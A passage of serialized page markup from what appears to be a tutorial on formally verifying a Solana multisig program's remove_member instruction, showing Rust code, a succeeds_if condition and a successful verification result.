},\n",{"type":25,"tag":216,"props":29371,"children":29372},{"class":6922,"line":7604},[29373],{"type":25,"tag":216,"props":29374,"children":29375},{"style":6964},[29376],{"type":31,"value":7874},{"type":25,"tag":38,"props":29378,"children":29379},{},[29380,29382,29387,29389,29394],{"type":31,"value":29381},"Here we see that the ",{"type":25,"tag":82,"props":29383,"children":29385},{"className":29384},[],[29386],{"type":31,"value":26695},{"type":31,"value":29388}," of the newly created ",{"type":25,"tag":82,"props":29390,"children":29392},{"className":29391},[],[29393],{"type":31,"value":26687},{"type":31,"value":29395}," account is larger than the number of keys (5112) which breaks our struct invariant.",{"type":25,"tag":606,"props":29397,"children":29399},{"id":29398},"verify-requirements-to-remove-a-member",[29400],{"type":31,"value":26725},{"type":25,"tag":38,"props":29402,"children":29403},{},[29404,29406,29411,29412,29417,29419,29425],{"type":31,"value":29405},"Now that we've seen both ",{"type":25,"tag":82,"props":29407,"children":29409},{"className":29408},[],[29410],{"type":31,"value":24115},{"type":31,"value":1307},{"type":25,"tag":82,"props":29413,"children":29415},{"className":29414},[],[29416],{"type":31,"value":25725},{"type":31,"value":29418}," let's take a look at the ",{"type":25,"tag":82,"props":29420,"children":29422},{"className":29421},[],[29423],{"type":31,"value":29424},"remove_member",{"type":31,"value":29426}," function:",{"type":25,"tag":206,"props":29428,"children":29430},{"code":29429,"language":6914,"meta":7,"className":6915,"style":7},"#[derive(Accounts, Debug)]\npub struct MsAuth\u003C'info> {\n    #[account(mut)]\n    multisig: Box\u003CAccount\u003C'info, Ms>>,\n    #[account(\n        mut,\n        seeds = [\n            b\"squad\",\n            multisig.create_key.as_ref(),\n            b\"multisig\"\n        ], bump = multisig.bump\n    )]\n    pub multisig_auth: Signer\u003C'info>,\n}\n\npub fn remove_member(ctx: Context\u003CMsAuth>, old_member: Pubkey) -> Result\u003C()> {\n    // if there is only one key in this multisig, reject the removal\n    if ctx.accounts.multisig.keys.len() == 1 {\n        return err!(MsError::CannotRemoveSoloMember);\n    }\n    ctx.accounts.multisig.remove_member(old_member)?;\n\n    // if the number of keys is now less than the threshold, adjust it\n    if ctx.accounts.multisig.keys.len() \u003C usize::from(ctx.accounts.multisig.threshold) {\n        let new_threshold: u16 = ctx.accounts.multisig.keys.len().try_into().unwrap();\n        ctx.accounts.multisig.change_threshold(new_threshold)?;\n    }\n    let new_index = ctx.accounts.multisig.transaction_index;\n    ctx.accounts.multisig.set_change_index(new_index)\n}\n",[29431],{"type":25,"tag":82,"props":29432,"children":29433},{"__ignoreMap":7},[29434,29457,29485,29500,29545,29552,29564,29580,29592,29618,29626,29655,29662,29694,29701,29708,29782,29790,29850,29882,29889,29940,29947,29955,30048,30137,30191,30198,30243,30288],{"type":25,"tag":216,"props":29435,"children":29436},{"class":6922,"line":6923},[29437,29441,29445,29449,29453],{"type":25,"tag":216,"props":29438,"children":29439},{"style":6964},[29440],{"type":31,"value":26783},{"type":25,"tag":216,"props":29442,"children":29443},{"style":7375},[29444],{"type":31,"value":26788},{"type":25,"tag":216,"props":29446,"children":29447},{"style":6964},[29448],{"type":31,"value":7026},{"type":25,"tag":216,"props":29450,"children":29451},{"style":7375},[29452],{"type":31,"value":28668},{"type":25,"tag":216,"props":29454,"children":29455},{"style":6964},[29456],{"type":31,"value":24218},{"type":25,"tag":216,"props":29458,"children":29459},{"class":6922,"line":6769},[29460,29464,29468,29473,29477,29481],{"type":25,"tag":216,"props":29461,"children":29462},{"style":6936},[29463],{"type":31,"value":17647},{"type":25,"tag":216,"props":29465,"children":29466},{"style":6936},[29467],{"type":31,"value":25111},{"type":25,"tag":216,"props":29469,"children":29470},{"style":7375},[29471],{"type":31,"value":29472}," MsAuth",{"type":25,"tag":216,"props":29474,"children":29475},{"style":6964},[29476],{"type":31,"value":26868},{"type":25,"tag":216,"props":29478,"children":29479},{"style":7375},[29480],{"type":31,"value":26873},{"type":25,"tag":216,"props":29482,"children":29483},{"style":6964},[29484],{"type":31,"value":11233},{"type":25,"tag":216,"props":29486,"children":29487},{"class":6922,"line":6778},[29488,29492,29496],{"type":25,"tag":216,"props":29489,"children":29490},{"style":6964},[29491],{"type":31,"value":27075},{"type":25,"tag":216,"props":29493,"children":29494},{"style":6936},[29495],{"type":31,"value":7691},{"type":25,"tag":216,"props":29497,"children":29498},{"style":6964},[29499],{"type":31,"value":24218},{"type":25,"tag":216,"props":29501,"children":29502},{"class":6922,"line":7005},[29503,29508,29512,29517,29521,29525,29529,29533,29537,29541],{"type":25,"tag":216,"props":29504,"children":29505},{"style":6947},[29506],{"type":31,"value":29507},"    multisig",{"type":25,"tag":216,"props":29509,"children":29510},{"style":6953},[29511],{"type":31,"value":1472},{"type":25,"tag":216,"props":29513,"children":29514},{"style":7375},[29515],{"type":31,"value":29516}," Box",{"type":25,"tag":216,"props":29518,"children":29519},{"style":6964},[29520],{"type":31,"value":9757},{"type":25,"tag":216,"props":29522,"children":29523},{"style":7375},[29524],{"type":31,"value":21104},{"type":25,"tag":216,"props":29526,"children":29527},{"style":6964},[29528],{"type":31,"value":26868},{"type":25,"tag":216,"props":29530,"children":29531},{"style":7375},[29532],{"type":31,"value":26873},{"type":25,"tag":216,"props":29534,"children":29535},{"style":6964},[29536],{"type":31,"value":7026},{"type":25,"tag":216,"props":29538,"children":29539},{"style":7375},[29540],{"type":31,"value":26687},{"type":25,"tag":216,"props":29542,"children":29543},{"style":6964},[29544],{"type":31,"value":10903},{"type":25,"tag":216,"props":29546,"children":29547},{"class":6922,"line":7110},[29548],{"type":25,"tag":216,"props":29549,"children":29550},{"style":6964},[29551],{"type":31,"value":26885},{"type":25,"tag":216,"props":29553,"children":29554},{"class":6922,"line":7216},[29555,29560],{"type":25,"tag":216,"props":29556,"children":29557},{"style":6936},[29558],{"type":31,"value":29559},"        mut",{"type":25,"tag":216,"props":29561,"children":29562},{"style":6964},[29563],{"type":31,"value":7465},{"type":25,"tag":216,"props":29565,"children":29566},{"class":6922,"line":7244},[29567,29571,29575],{"type":25,"tag":216,"props":29568,"children":29569},{"style":6964},[29570],{"type":31,"value":26969},{"type":25,"tag":216,"props":29572,"children":29573},{"style":6953},[29574],{"type":31,"value":266},{"type":25,"tag":216,"props":29576,"children":29577},{"style":6964},[29578],{"type":31,"value":29579}," [\n",{"type":25,"tag":216,"props":29581,"children":29582},{"class":6922,"line":7257},[29583,29588],{"type":25,"tag":216,"props":29584,"children":29585},{"style":8205},[29586],{"type":31,"value":29587},"            b\"squad\"",{"type":25,"tag":216,"props":29589,"children":29590},{"style":6964},[29591],{"type":31,"value":7465},{"type":25,"tag":216,"props":29593,"children":29594},{"class":6922,"line":7275},[29595,29600,29604,29609,29613],{"type":25,"tag":216,"props":29596,"children":29597},{"style":6964},[29598],{"type":31,"value":29599},"            multisig",{"type":25,"tag":216,"props":29601,"children":29602},{"style":6953},[29603],{"type":31,"value":179},{"type":25,"tag":216,"props":29605,"children":29606},{"style":6964},[29607],{"type":31,"value":29608},"create_key",{"type":25,"tag":216,"props":29610,"children":29611},{"style":6953},[29612],{"type":31,"value":179},{"type":25,"tag":216,"props":29614,"children":29615},{"style":6964},[29616],{"type":31,"value":29617},"as_ref(),\n",{"type":25,"tag":216,"props":29619,"children":29620},{"class":6922,"line":7296},[29621],{"type":25,"tag":216,"props":29622,"children":29623},{"style":8205},[29624],{"type":31,"value":29625},"            b\"multisig\"\n",{"type":25,"tag":216,"props":29627,"children":29628},{"class":6922,"line":7305},[29629,29634,29639,29643,29647,29651],{"type":25,"tag":216,"props":29630,"children":29631},{"style":6964},[29632],{"type":31,"value":29633},"        ], ",{"type":25,"tag":216,"props":29635,"children":29636},{"style":6947},[29637],{"type":31,"value":29638},"bump",{"type":25,"tag":216,"props":29640,"children":29641},{"style":6953},[29642],{"type":31,"value":6956},{"type":25,"tag":216,"props":29644,"children":29645},{"style":6947},[29646],{"type":31,"value":27031},{"type":25,"tag":216,"props":29648,"children":29649},{"style":6953},[29650],{"type":31,"value":179},{"type":25,"tag":216,"props":29652,"children":29653},{"style":6964},[29654],{"type":31,"value":27011},{"type":25,"tag":216,"props":29656,"children":29657},{"class":6922,"line":7557},[29658],{"type":25,"tag":216,"props":29659,"children":29660},{"style":6964},[29661],{"type":31,"value":27019},{"type":25,"tag":216,"props":29663,"children":29664},{"class":6922,"line":7574},[29665,29669,29674,29678,29682,29686,29690],{"type":25,"tag":216,"props":29666,"children":29667},{"style":6936},[29668],{"type":31,"value":24803},{"type":25,"tag":216,"props":29670,"children":29671},{"style":6947},[29672],{"type":31,"value":29673}," multisig_auth",{"type":25,"tag":216,"props":29675,"children":29676},{"style":6953},[29677],{"type":31,"value":1472},{"type":25,"tag":216,"props":29679,"children":29680},{"style":7375},[29681],{"type":31,"value":27104},{"type":25,"tag":216,"props":29683,"children":29684},{"style":6964},[29685],{"type":31,"value":26868},{"type":25,"tag":216,"props":29687,"children":29688},{"style":7375},[29689],{"type":31,"value":26873},{"type":25,"tag":216,"props":29691,"children":29692},{"style":6964},[29693],{"type":31,"value":10089},{"type":25,"tag":216,"props":29695,"children":29696},{"class":6922,"line":7591},[29697],{"type":25,"tag":216,"props":29698,"children":29699},{"style":6964},[29700],{"type":31,"value":7874},{"type":25,"tag":216,"props":29702,"children":29703},{"class":6922,"line":7604},[29704],{"type":25,"tag":216,"props":29705,"children":29706},{"emptyLinePlaceholder":16},[29707],{"type":31,"value":7642},{"type":25,"tag":216,"props":29709,"children":29710},{"class":6922,"line":7613},[29711,29715,29719,29724,29728,29732,29736,29740,29744,29749,29753,29758,29762,29766,29770,29774,29778],{"type":25,"tag":216,"props":29712,"children":29713},{"style":6936},[29714],{"type":31,"value":17647},{"type":25,"tag":216,"props":29716,"children":29717},{"style":6936},[29718],{"type":31,"value":17652},{"type":25,"tag":216,"props":29720,"children":29721},{"style":7047},[29722],{"type":31,"value":29723}," remove_member",{"type":25,"tag":216,"props":29725,"children":29726},{"style":6964},[29727],{"type":31,"value":1850},{"type":25,"tag":216,"props":29729,"children":29730},{"style":6947},[29731],{"type":31,"value":24240},{"type":25,"tag":216,"props":29733,"children":29734},{"style":6953},[29735],{"type":31,"value":1472},{"type":25,"tag":216,"props":29737,"children":29738},{"style":7375},[29739],{"type":31,"value":24249},{"type":25,"tag":216,"props":29741,"children":29742},{"style":6964},[29743],{"type":31,"value":9757},{"type":25,"tag":216,"props":29745,"children":29746},{"style":7375},[29747],{"type":31,"value":29748},"MsAuth",{"type":25,"tag":216,"props":29750,"children":29751},{"style":6964},[29752],{"type":31,"value":10582},{"type":25,"tag":216,"props":29754,"children":29755},{"style":6947},[29756],{"type":31,"value":29757},"old_member",{"type":25,"tag":216,"props":29759,"children":29760},{"style":6953},[29761],{"type":31,"value":1472},{"type":25,"tag":216,"props":29763,"children":29764},{"style":7375},[29765],{"type":31,"value":24817},{"type":25,"tag":216,"props":29767,"children":29768},{"style":6964},[29769],{"type":31,"value":7036},{"type":25,"tag":216,"props":29771,"children":29772},{"style":6953},[29773],{"type":31,"value":17714},{"type":25,"tag":216,"props":29775,"children":29776},{"style":7375},[29777],{"type":31,"value":17719},{"type":25,"tag":216,"props":29779,"children":29780},{"style":6964},[29781],{"type":31,"value":24291},{"type":25,"tag":216,"props":29783,"children":29784},{"class":6922,"line":7636},[29785],{"type":25,"tag":216,"props":29786,"children":29787},{"style":6927},[29788],{"type":31,"value":29789},"    // if there is only one key in this multisig, reject the removal\n",{"type":25,"tag":216,"props":29791,"children":29792},{"class":6922,"line":7645},[29793,29797,29802,29806,29810,29814,29818,29822,29826,29830,29834,29838,29842,29846],{"type":25,"tag":216,"props":29794,"children":29795},{"style":6973},[29796],{"type":31,"value":16235},{"type":25,"tag":216,"props":29798,"children":29799},{"style":6947},[29800],{"type":31,"value":29801}," ctx",{"type":25,"tag":216,"props":29803,"children":29804},{"style":6953},[29805],{"type":31,"value":179},{"type":25,"tag":216,"props":29807,"children":29808},{"style":6964},[29809],{"type":31,"value":18632},{"type":25,"tag":216,"props":29811,"children":29812},{"style":6953},[29813],{"type":31,"value":179},{"type":25,"tag":216,"props":29815,"children":29816},{"style":6964},[29817],{"type":31,"value":27762},{"type":25,"tag":216,"props":29819,"children":29820},{"style":6953},[29821],{"type":31,"value":179},{"type":25,"tag":216,"props":29823,"children":29824},{"style":6964},[29825],{"type":31,"value":24943},{"type":25,"tag":216,"props":29827,"children":29828},{"style":6953},[29829],{"type":31,"value":179},{"type":25,"tag":216,"props":29831,"children":29832},{"style":7047},[29833],{"type":31,"value":13094},{"type":25,"tag":216,"props":29835,"children":29836},{"style":6964},[29837],{"type":31,"value":18000},{"type":25,"tag":216,"props":29839,"children":29840},{"style":6953},[29841],{"type":31,"value":12528},{"type":25,"tag":216,"props":29843,"children":29844},{"style":6989},[29845],{"type":31,"value":8471},{"type":25,"tag":216,"props":29847,"children":29848},{"style":6964},[29849],{"type":31,"value":7241},{"type":25,"tag":216,"props":29851,"children":29852},{"class":6922,"line":7654},[29853,29857,29861,29865,29869,29873,29878],{"type":25,"tag":216,"props":29854,"children":29855},{"style":6973},[29856],{"type":31,"value":19702},{"type":25,"tag":216,"props":29858,"children":29859},{"style":7047},[29860],{"type":31,"value":27465},{"type":25,"tag":216,"props":29862,"children":29863},{"style":6964},[29864],{"type":31,"value":1850},{"type":25,"tag":216,"props":29866,"children":29867},{"style":7375},[29868],{"type":31,"value":27474},{"type":25,"tag":216,"props":29870,"children":29871},{"style":6953},[29872],{"type":31,"value":7438},{"type":25,"tag":216,"props":29874,"children":29875},{"style":7375},[29876],{"type":31,"value":29877},"CannotRemoveSoloMember",{"type":25,"tag":216,"props":29879,"children":29880},{"style":6964},[29881],{"type":31,"value":7797},{"type":25,"tag":216,"props":29883,"children":29884},{"class":6922,"line":7722},[29885],{"type":25,"tag":216,"props":29886,"children":29887},{"style":6964},[29888],{"type":31,"value":7311},{"type":25,"tag":216,"props":29890,"children":29891},{"class":6922,"line":7730},[29892,29896,29900,29904,29908,29912,29916,29920,29924,29928,29932,29936],{"type":25,"tag":216,"props":29893,"children":29894},{"style":6947},[29895],{"type":31,"value":24183},{"type":25,"tag":216,"props":29897,"children":29898},{"style":6953},[29899],{"type":31,"value":179},{"type":25,"tag":216,"props":29901,"children":29902},{"style":6964},[29903],{"type":31,"value":18632},{"type":25,"tag":216,"props":29905,"children":29906},{"style":6953},[29907],{"type":31,"value":179},{"type":25,"tag":216,"props":29909,"children":29910},{"style":6964},[29911],{"type":31,"value":27762},{"type":25,"tag":216,"props":29913,"children":29914},{"style":6953},[29915],{"type":31,"value":179},{"type":25,"tag":216,"props":29917,"children":29918},{"style":7047},[29919],{"type":31,"value":29424},{"type":25,"tag":216,"props":29921,"children":29922},{"style":6964},[29923],{"type":31,"value":1850},{"type":25,"tag":216,"props":29925,"children":29926},{"style":6947},[29927],{"type":31,"value":29757},{"type":25,"tag":216,"props":29929,"children":29930},{"style":6964},[29931],{"type":31,"value":1888},{"type":25,"tag":216,"props":29933,"children":29934},{"style":6953},[29935],{"type":31,"value":604},{"type":25,"tag":216,"props":29937,"children":29938},{"style":6964},[29939],{"type":31,"value":6967},{"type":25,"tag":216,"props":29941,"children":29942},{"class":6922,"line":7760},[29943],{"type":25,"tag":216,"props":29944,"children":29945},{"emptyLinePlaceholder":16},[29946],{"type":31,"value":7642},{"type":25,"tag":216,"props":29948,"children":29949},{"class":6922,"line":7768},[29950],{"type":25,"tag":216,"props":29951,"children":29952},{"style":6927},[29953],{"type":31,"value":29954},"    // if the number of keys is now less than the threshold, adjust it\n",{"type":25,"tag":216,"props":29956,"children":29957},{"class":6922,"line":7800},[29958,29962,29966,29970,29974,29978,29982,29986,29990,29994,29998,30003,30007,30011,30015,30019,30023,30027,30031,30035,30039,30043],{"type":25,"tag":216,"props":29959,"children":29960},{"style":6973},[29961],{"type":31,"value":16235},{"type":25,"tag":216,"props":29963,"children":29964},{"style":6947},[29965],{"type":31,"value":29801},{"type":25,"tag":216,"props":29967,"children":29968},{"style":6953},[29969],{"type":31,"value":179},{"type":25,"tag":216,"props":29971,"children":29972},{"style":6964},[29973],{"type":31,"value":18632},{"type":25,"tag":216,"props":29975,"children":29976},{"style":6953},[29977],{"type":31,"value":179},{"type":25,"tag":216,"props":29979,"children":29980},{"style":6964},[29981],{"type":31,"value":27762},{"type":25,"tag":216,"props":29983,"children":29984},{"style":6953},[29985],{"type":31,"value":179},{"type":25,"tag":216,"props":29987,"children":29988},{"style":6964},[29989],{"type":31,"value":24943},{"type":25,"tag":216,"props":29991,"children":29992},{"style":6953},[29993],{"type":31,"value":179},{"type":25,"tag":216,"props":29995,"children":29996},{"style":7047},[29997],{"type":31,"value":13094},{"type":25,"tag":216,"props":29999,"children":30000},{"style":6964},[30001],{"type":31,"value":30002},"() \u003C ",{"type":25,"tag":216,"props":30004,"children":30005},{"style":7375},[30006],{"type":31,"value":20560},{"type":25,"tag":216,"props":30008,"children":30009},{"style":6953},[30010],{"type":31,"value":7438},{"type":25,"tag":216,"props":30012,"children":30013},{"style":7047},[30014],{"type":31,"value":23433},{"type":25,"tag":216,"props":30016,"children":30017},{"style":6964},[30018],{"type":31,"value":1850},{"type":25,"tag":216,"props":30020,"children":30021},{"style":6947},[30022],{"type":31,"value":24240},{"type":25,"tag":216,"props":30024,"children":30025},{"style":6953},[30026],{"type":31,"value":179},{"type":25,"tag":216,"props":30028,"children":30029},{"style":6964},[30030],{"type":31,"value":18632},{"type":25,"tag":216,"props":30032,"children":30033},{"style":6953},[30034],{"type":31,"value":179},{"type":25,"tag":216,"props":30036,"children":30037},{"style":6964},[30038],{"type":31,"value":27762},{"type":25,"tag":216,"props":30040,"children":30041},{"style":6953},[30042],{"type":31,"value":179},{"type":25,"tag":216,"props":30044,"children":30045},{"style":6964},[30046],{"type":31,"value":30047},"threshold) {\n",{"type":25,"tag":216,"props":30049,"children":30050},{"class":6922,"line":7808},[30051,30055,30060,30064,30068,30072,30076,30080,30084,30088,30092,30096,30100,30104,30108,30112,30116,30121,30125,30129,30133],{"type":25,"tag":216,"props":30052,"children":30053},{"style":6936},[30054],{"type":31,"value":7011},{"type":25,"tag":216,"props":30056,"children":30057},{"style":6947},[30058],{"type":31,"value":30059}," new_threshold",{"type":25,"tag":216,"props":30061,"children":30062},{"style":6953},[30063],{"type":31,"value":1472},{"type":25,"tag":216,"props":30065,"children":30066},{"style":7375},[30067],{"type":31,"value":24990},{"type":25,"tag":216,"props":30069,"children":30070},{"style":6953},[30071],{"type":31,"value":6956},{"type":25,"tag":216,"props":30073,"children":30074},{"style":6947},[30075],{"type":31,"value":29801},{"type":25,"tag":216,"props":30077,"children":30078},{"style":6953},[30079],{"type":31,"value":179},{"type":25,"tag":216,"props":30081,"children":30082},{"style":6964},[30083],{"type":31,"value":18632},{"type":25,"tag":216,"props":30085,"children":30086},{"style":6953},[30087],{"type":31,"value":179},{"type":25,"tag":216,"props":30089,"children":30090},{"style":6964},[30091],{"type":31,"value":27762},{"type":25,"tag":216,"props":30093,"children":30094},{"style":6953},[30095],{"type":31,"value":179},{"type":25,"tag":216,"props":30097,"children":30098},{"style":6964},[30099],{"type":31,"value":24943},{"type":25,"tag":216,"props":30101,"children":30102},{"style":6953},[30103],{"type":31,"value":179},{"type":25,"tag":216,"props":30105,"children":30106},{"style":7047},[30107],{"type":31,"value":13094},{"type":25,"tag":216,"props":30109,"children":30110},{"style":6964},[30111],{"type":31,"value":17836},{"type":25,"tag":216,"props":30113,"children":30114},{"style":6953},[30115],{"type":31,"value":179},{"type":25,"tag":216,"props":30117,"children":30118},{"style":7047},[30119],{"type":31,"value":30120},"try_into",{"type":25,"tag":216,"props":30122,"children":30123},{"style":6964},[30124],{"type":31,"value":17836},{"type":25,"tag":216,"props":30126,"children":30127},{"style":6953},[30128],{"type":31,"value":179},{"type":25,"tag":216,"props":30130,"children":30131},{"style":7047},[30132],{"type":31,"value":7628},{"type":25,"tag":216,"props":30134,"children":30135},{"style":6964},[30136],{"type":31,"value":7633},{"type":25,"tag":216,"props":30138,"children":30139},{"class":6922,"line":7868},[30140,30145,30149,30153,30157,30161,30165,30170,30174,30179,30183,30187],{"type":25,"tag":216,"props":30141,"children":30142},{"style":6947},[30143],{"type":31,"value":30144},"        ctx",{"type":25,"tag":216,"props":30146,"children":30147},{"style":6953},[30148],{"type":31,"value":179},{"type":25,"tag":216,"props":30150,"children":30151},{"style":6964},[30152],{"type":31,"value":18632},{"type":25,"tag":216,"props":30154,"children":30155},{"style":6953},[30156],{"type":31,"value":179},{"type":25,"tag":216,"props":30158,"children":30159},{"style":6964},[30160],{"type":31,"value":27762},{"type":25,"tag":216,"props":30162,"children":30163},{"style":6953},[30164],{"type":31,"value":179},{"type":25,"tag":216,"props":30166,"children":30167},{"style":7047},[30168],{"type":31,"value":30169},"change_threshold",{"type":25,"tag":216,"props":30171,"children":30172},{"style":6964},[30173],{"type":31,"value":1850},{"type":25,"tag":216,"props":30175,"children":30176},{"style":6947},[30177],{"type":31,"value":30178},"new_threshold",{"type":25,"tag":216,"props":30180,"children":30181},{"style":6964},[30182],{"type":31,"value":1888},{"type":25,"tag":216,"props":30184,"children":30185},{"style":6953},[30186],{"type":31,"value":604},{"type":25,"tag":216,"props":30188,"children":30189},{"style":6964},[30190],{"type":31,"value":6967},{"type":25,"tag":216,"props":30192,"children":30193},{"class":6922,"line":13001},[30194],{"type":25,"tag":216,"props":30195,"children":30196},{"style":6964},[30197],{"type":31,"value":7311},{"type":25,"tag":216,"props":30199,"children":30200},{"class":6922,"line":13019},[30201,30205,30210,30214,30218,30222,30226,30230,30234,30238],{"type":25,"tag":216,"props":30202,"children":30203},{"style":6936},[30204],{"type":31,"value":6939},{"type":25,"tag":216,"props":30206,"children":30207},{"style":6947},[30208],{"type":31,"value":30209}," new_index",{"type":25,"tag":216,"props":30211,"children":30212},{"style":6953},[30213],{"type":31,"value":6956},{"type":25,"tag":216,"props":30215,"children":30216},{"style":6947},[30217],{"type":31,"value":29801},{"type":25,"tag":216,"props":30219,"children":30220},{"style":6953},[30221],{"type":31,"value":179},{"type":25,"tag":216,"props":30223,"children":30224},{"style":6964},[30225],{"type":31,"value":18632},{"type":25,"tag":216,"props":30227,"children":30228},{"style":6953},[30229],{"type":31,"value":179},{"type":25,"tag":216,"props":30231,"children":30232},{"style":6964},[30233],{"type":31,"value":27762},{"type":25,"tag":216,"props":30235,"children":30236},{"style":6953},[30237],{"type":31,"value":179},{"type":25,"tag":216,"props":30239,"children":30240},{"style":6964},[30241],{"type":31,"value":30242},"transaction_index;\n",{"type":25,"tag":216,"props":30244,"children":30245},{"class":6922,"line":13064},[30246,30250,30254,30258,30262,30266,30270,30275,30279,30284],{"type":25,"tag":216,"props":30247,"children":30248},{"style":6947},[30249],{"type":31,"value":24183},{"type":25,"tag":216,"props":30251,"children":30252},{"style":6953},[30253],{"type":31,"value":179},{"type":25,"tag":216,"props":30255,"children":30256},{"style":6964},[30257],{"type":31,"value":18632},{"type":25,"tag":216,"props":30259,"children":30260},{"style":6953},[30261],{"type":31,"value":179},{"type":25,"tag":216,"props":30263,"children":30264},{"style":6964},[30265],{"type":31,"value":27762},{"type":25,"tag":216,"props":30267,"children":30268},{"style":6953},[30269],{"type":31,"value":179},{"type":25,"tag":216,"props":30271,"children":30272},{"style":7047},[30273],{"type":31,"value":30274},"set_change_index",{"type":25,"tag":216,"props":30276,"children":30277},{"style":6964},[30278],{"type":31,"value":1850},{"type":25,"tag":216,"props":30280,"children":30281},{"style":6947},[30282],{"type":31,"value":30283},"new_index",{"type":25,"tag":216,"props":30285,"children":30286},{"style":6964},[30287],{"type":31,"value":7107},{"type":25,"tag":216,"props":30289,"children":30290},{"class":6922,"line":13170},[30291],{"type":25,"tag":216,"props":30292,"children":30293},{"style":6964},[30294],{"type":31,"value":7874},{"type":25,"tag":38,"props":30296,"children":30297},{},[30298,30300,30305],{"type":31,"value":30299},"First let's establish the ",{"type":25,"tag":82,"props":30301,"children":30303},{"className":30302},[],[30304],{"type":31,"value":24115},{"type":31,"value":30306}," condition. We can do this either interactively, following counterexamples like in the first example or we can guess what a sufficient condition might be:",{"type":25,"tag":206,"props":30308,"children":30310},{"code":30309,"language":6914,"meta":7,"className":6915,"style":7},"#[succeeds_if(\n    ctx.accounts.multisig.keys.len() > 1\n)]\nfn remove_member(...) { ... }\n",[30311],{"type":25,"tag":82,"props":30312,"children":30313},{"__ignoreMap":7},[30314,30321,30368,30375],{"type":25,"tag":216,"props":30315,"children":30316},{"class":6922,"line":6923},[30317],{"type":25,"tag":216,"props":30318,"children":30319},{"style":6964},[30320],{"type":31,"value":28069},{"type":25,"tag":216,"props":30322,"children":30323},{"class":6922,"line":6769},[30324,30328,30332,30336,30340,30344,30348,30352,30356,30360,30364],{"type":25,"tag":216,"props":30325,"children":30326},{"style":6964},[30327],{"type":31,"value":24183},{"type":25,"tag":216,"props":30329,"children":30330},{"style":6953},[30331],{"type":31,"value":179},{"type":25,"tag":216,"props":30333,"children":30334},{"style":6964},[30335],{"type":31,"value":18632},{"type":25,"tag":216,"props":30337,"children":30338},{"style":6953},[30339],{"type":31,"value":179},{"type":25,"tag":216,"props":30341,"children":30342},{"style":6964},[30343],{"type":31,"value":27762},{"type":25,"tag":216,"props":30345,"children":30346},{"style":6953},[30347],{"type":31,"value":179},{"type":25,"tag":216,"props":30349,"children":30350},{"style":6964},[30351],{"type":31,"value":24943},{"type":25,"tag":216,"props":30353,"children":30354},{"style":6953},[30355],{"type":31,"value":179},{"type":25,"tag":216,"props":30357,"children":30358},{"style":6964},[30359],{"type":31,"value":24981},{"type":25,"tag":216,"props":30361,"children":30362},{"style":6953},[30363],{"type":31,"value":5902},{"type":25,"tag":216,"props":30365,"children":30366},{"style":6964},[30367],{"type":31,"value":23402},{"type":25,"tag":216,"props":30369,"children":30370},{"class":6922,"line":6778},[30371],{"type":25,"tag":216,"props":30372,"children":30373},{"style":6964},[30374],{"type":31,"value":24218},{"type":25,"tag":216,"props":30376,"children":30377},{"class":6922,"line":7005},[30378,30382,30386,30390,30394,30398,30402],{"type":25,"tag":216,"props":30379,"children":30380},{"style":6936},[30381],{"type":31,"value":24226},{"type":25,"tag":216,"props":30383,"children":30384},{"style":7047},[30385],{"type":31,"value":29723},{"type":25,"tag":216,"props":30387,"children":30388},{"style":6964},[30389],{"type":31,"value":1850},{"type":25,"tag":216,"props":30391,"children":30392},{"style":6953},[30393],{"type":31,"value":13547},{"type":25,"tag":216,"props":30395,"children":30396},{"style":6964},[30397],{"type":31,"value":27946},{"type":25,"tag":216,"props":30399,"children":30400},{"style":6953},[30401],{"type":31,"value":13547},{"type":25,"tag":216,"props":30403,"children":30404},{"style":6964},[30405],{"type":31,"value":13552},{"type":25,"tag":38,"props":30407,"children":30408},{},[30409,30411,30416],{"type":31,"value":30410},"And for now let's remove the invariant on the ",{"type":25,"tag":82,"props":30412,"children":30414},{"className":30413},[],[30415],{"type":31,"value":26687},{"type":31,"value":30417}," account:",{"type":25,"tag":206,"props":30419,"children":30421},{"code":30420,"language":6914,"meta":7,"className":6915,"style":7},"#[invariant()]\npub struct Ms { ... }\n",[30422],{"type":25,"tag":82,"props":30423,"children":30424},{"__ignoreMap":7},[30425,30433],{"type":25,"tag":216,"props":30426,"children":30427},{"class":6922,"line":6923},[30428],{"type":25,"tag":216,"props":30429,"children":30430},{"style":6964},[30431],{"type":31,"value":30432},"#[invariant()]\n",{"type":25,"tag":216,"props":30434,"children":30435},{"class":6922,"line":6769},[30436,30440,30444,30448,30452,30456],{"type":25,"tag":216,"props":30437,"children":30438},{"style":6936},[30439],{"type":31,"value":17647},{"type":25,"tag":216,"props":30441,"children":30442},{"style":6936},[30443],{"type":31,"value":25111},{"type":25,"tag":216,"props":30445,"children":30446},{"style":7375},[30447],{"type":31,"value":25116},{"type":25,"tag":216,"props":30449,"children":30450},{"style":6964},[30451],{"type":31,"value":13542},{"type":25,"tag":216,"props":30453,"children":30454},{"style":6953},[30455],{"type":31,"value":13547},{"type":25,"tag":216,"props":30457,"children":30458},{"style":6964},[30459],{"type":31,"value":13552},{"type":25,"tag":38,"props":30461,"children":30462},{},[30463],{"type":31,"value":30464},"Let's test this!",{"type":25,"tag":38,"props":30466,"children":30467},{},[30468,30470,30475],{"type":31,"value":30469},"Our ",{"type":25,"tag":82,"props":30471,"children":30473},{"className":30472},[],[30474],{"type":31,"value":24115},{"type":31,"value":30476}," harness produces:",{"type":25,"tag":206,"props":30478,"children":30480},{"code":30479},"VERIFICATION:- SUCCESSFUL\nVerification Time: 28.119272s\n",[30481],{"type":25,"tag":82,"props":30482,"children":30483},{"__ignoreMap":7},[30484],{"type":31,"value":30479},{"type":25,"tag":38,"props":30486,"children":30487},{},[30488],{"type":31,"value":30489},"This tells us that if our multisig has at least two keys then the instruction will succeed.",{"type":25,"tag":38,"props":30491,"children":30492},{},[30493,30495,30500],{"type":31,"value":30494},"However, remember that since ",{"type":25,"tag":82,"props":30496,"children":30498},{"className":30497},[],[30499],{"type":31,"value":24115},{"type":31,"value":30501}," represents just the sufficient conditions, there may be other cases where the function succeeds.",{"type":25,"tag":38,"props":30503,"children":30504},{},[30505,30507,30512,30514,30519,30521,30526],{"type":31,"value":30506},"Suppose we want to be sure that this condition is the ",{"type":25,"tag":64,"props":30508,"children":30509},{},[30510],{"type":31,"value":30511},"only condition",{"type":31,"value":30513}," in which the function will succeed (i.e. ",{"type":25,"tag":64,"props":30515,"children":30516},{},[30517],{"type":31,"value":30518},"\"the function will succeed if and only if the multisig has at least two keys\"",{"type":31,"value":30520},"). We could attempt to verify the other side of this with an ",{"type":25,"tag":82,"props":30522,"children":30524},{"className":30523},[],[30525],{"type":31,"value":24122},{"type":31,"value":30527}," macro such 